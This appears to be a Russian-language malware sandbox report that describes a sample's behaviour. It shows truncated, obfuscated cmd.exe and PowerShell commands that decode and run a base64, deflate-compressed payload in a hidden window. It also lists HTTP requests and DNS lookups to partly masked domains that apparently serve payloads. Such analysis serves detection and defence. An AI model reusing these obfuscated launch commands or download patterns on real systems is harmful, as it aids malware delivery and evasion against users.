Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' cmD.Exe /c "sET jflB= (new-object sYsTeM.IO.COMpREsSiOn.dEfLATeStrEAM([SySTEM.iO.mEmorySTrEAM][ConveRT]::FroMBaSe64sTriNg( 'TZBdTwIxEEX/yj40KQTpJj7wQLMJBkXxA0JMNBhfZrcDW9vOrGzZVQn/XSCS+Drn3p...
Сетевая активность
Подключается к
- 'de####asidunia.com':80
- 'de####asidunia.com':443
- 'di######fo.asahankab.go.id':80
- 'di######fo.asahankab.go.id':443
TCP
Запросы HTTP GET
- http://de####asidunia.com/wQYk
- http://www.di######fo.asahankab.go.id/kkYOegA
Другие
- 'de####asidunia.com':443
- 'di######fo.asahankab.go.id':443
UDP
- DNS ASK ph####nhdanong.com
- DNS ASK ba##llon.ru
- DNS ASK e-##om.mobi
- DNS ASK de####asidunia.com
- DNS ASK di######fo.asahankab.go.id
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' cmD.Exe /c "sET jflB= (new-object sYsTeM.IO.COMpREsSiOn.dEfLATeStrEAM([SySTEM.iO.mEmorySTrEAM][ConveRT]::FroMBaSe64sTriNg( 'TZBdTwIxEEX/yj40KQTpJj7wQLMJBkXxA0JMNBhfZrcDW9vOrGzZVQn/XSCS+Drn3p...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Sv ( \"bN\" + \"w\") ( [tyPE]( \"{0}{1}{2}\"-f'e','nv','IROnMenT') ) ; ${exeCu`TI`o`NConTExT}.\"Invo`keC`om`m`And\".\"InV`OK`e`SCRIpt\"( ( ( GET-CHiLDiTEm ( 'var' + 'iaB'+'l...
